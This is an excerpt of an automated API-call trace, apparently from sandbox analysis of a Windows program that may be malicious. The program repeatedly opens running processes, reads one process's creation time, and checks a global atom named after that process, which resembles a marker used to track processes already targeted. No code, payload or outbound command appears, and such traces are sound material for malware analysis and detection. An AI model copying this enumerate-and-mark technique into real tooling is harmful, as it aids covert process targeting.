	[0118.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.821] CloseHandle (hObject=0x698) returned 1
	[0118.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.822] CloseHandle (hObject=0x698) returned 1
	[0118.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.822] CloseHandle (hObject=0x698) returned 1
	[0118.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.822] CloseHandle (hObject=0x698) returned 1
	[0118.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.822] CloseHandle (hObject=0x698) returned 1
	[0118.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.823] CloseHandle (hObject=0x698) returned 1
	[0118.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.823] CloseHandle (hObject=0x698) returned 1
	[0118.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.823] CloseHandle (hObject=0x698) returned 1
	[0118.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.823] CloseHandle (hObject=0x698) returned 1
	[0118.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.823] CloseHandle (hObject=0x698) returned 1
	[0118.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.824] CloseHandle (hObject=0x698) returned 1
	[0118.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.824] CloseHandle (hObject=0x698) returned 1
	[0118.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.824] CloseHandle (hObject=0x698) returned 1
	[0118.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.824] CloseHandle (hObject=0x698) returned 1
	[0118.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.824] CloseHandle (hObject=0x698) returned 1
	[0118.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.825] CloseHandle (hObject=0x698) returned 1
	[0118.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.825] CloseHandle (hObject=0x698) returned 1
	[0118.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.825] CloseHandle (hObject=0x698) returned 1
	[0118.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.825] CloseHandle (hObject=0x698) returned 1
	[0118.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.825] CloseHandle (hObject=0x698) returned 1
	[0118.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.826] CloseHandle (hObject=0x698) returned 1
	[0118.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.826] CloseHandle (hObject=0x698) returned 1
	[0118.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.826] CloseHandle (hObject=0x698) returned 1
	[0118.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.826] CloseHandle (hObject=0x698) returned 1
	[0118.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.826] CloseHandle (hObject=0x698) returned 1
	[0118.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.827] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.827] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.827] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.827] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.828] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.828] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.828] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.828] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.829] CloseHandle (hObject=0x698) returned 1
	[0118.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.829] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.829] CloseHandle (hObject=0x698) returned 1
	[0118.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.829] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.829] CloseHandle (hObject=0x698) returned 1
	[0118.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.829] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.829] CloseHandle (hObject=0x698) returned 1
	[0118.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.864] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.864] CloseHandle (hObject=0x698) returned 1
	[0118.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.864] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.864] CloseHandle (hObject=0x698) returned 1
	[0118.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.865] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.865] CloseHandle (hObject=0x698) returned 1
	[0118.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.865] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.865] CloseHandle (hObject=0x698) returned 1
	[0118.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.865] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.865] CloseHandle (hObject=0x698) returned 1
	[0118.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.865] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.865] CloseHandle (hObject=0x698) returned 1
	[0118.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.866] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.866] CloseHandle (hObject=0x698) returned 1
	[0118.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.866] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.866] CloseHandle (hObject=0x698) returned 1
	[0118.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.866] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.866] CloseHandle (hObject=0x698) returned 1
	[0118.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.866] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.866] CloseHandle (hObject=0x698) returned 1
	[0118.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.866] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.867] CloseHandle (hObject=0x698) returned 1
	[0118.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.867] CloseHandle (hObject=0x698) returned 1
	[0118.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.867] CloseHandle (hObject=0x698) returned 1
	[0118.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.867] CloseHandle (hObject=0x698) returned 1
	[0118.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.867] CloseHandle (hObject=0x698) returned 1
	[0118.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.867] CloseHandle (hObject=0x698) returned 1
	[0118.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.868] CloseHandle (hObject=0x698) returned 1
	[0118.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.868] CloseHandle (hObject=0x698) returned 1
	[0118.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.869] CloseHandle (hObject=0x698) returned 1
	[0118.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.869] CloseHandle (hObject=0x698) returned 1
	[0118.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.869] CloseHandle (hObject=0x698) returned 1
	[0118.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.869] CloseHandle (hObject=0x698) returned 1
	[0118.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.869] CloseHandle (hObject=0x698) returned 1
	[0118.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.870] CloseHandle (hObject=0x698) returned 1
	[0118.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.870] CloseHandle (hObject=0x698) returned 1
	[0118.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.870] CloseHandle (hObject=0x698) returned 1
	[0118.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.870] CloseHandle (hObject=0x698) returned 1
	[0118.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.871] CloseHandle (hObject=0x698) returned 1
	[0118.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.871] CloseHandle (hObject=0x698) returned 1
	[0118.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.871] CloseHandle (hObject=0x698) returned 1
	[0118.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.871] CloseHandle (hObject=0x698) returned 1
	[0118.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.872] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.872] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.872] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.872] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.872] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.873] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.873] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.873] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.873] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.873] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.873] CloseHandle (hObject=0x698) returned 1
	[0118.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.873] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.873] CloseHandle (hObject=0x698) returned 1
	[0118.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.874] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.874] CloseHandle (hObject=0x698) returned 1
	[0118.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.874] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.874] CloseHandle (hObject=0x698) returned 1
	[0118.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.908] CloseHandle (hObject=0x698) returned 1
	[0118.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.909] CloseHandle (hObject=0x698) returned 1
	[0118.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.909] CloseHandle (hObject=0x698) returned 1
	[0118.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.909] CloseHandle (hObject=0x698) returned 1
	[0118.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.909] CloseHandle (hObject=0x698) returned 1
	[0118.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.910] CloseHandle (hObject=0x698) returned 1
	[0118.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.910] CloseHandle (hObject=0x698) returned 1
	[0118.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.910] CloseHandle (hObject=0x698) returned 1
	[0118.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.910] CloseHandle (hObject=0x698) returned 1
	[0118.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.911] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.911] CloseHandle (hObject=0x698) returned 1
	[0118.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.911] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.911] CloseHandle (hObject=0x698) returned 1
	[0118.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.911] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.911] CloseHandle (hObject=0x698) returned 1
	[0118.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.911] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.911] CloseHandle (hObject=0x698) returned 1
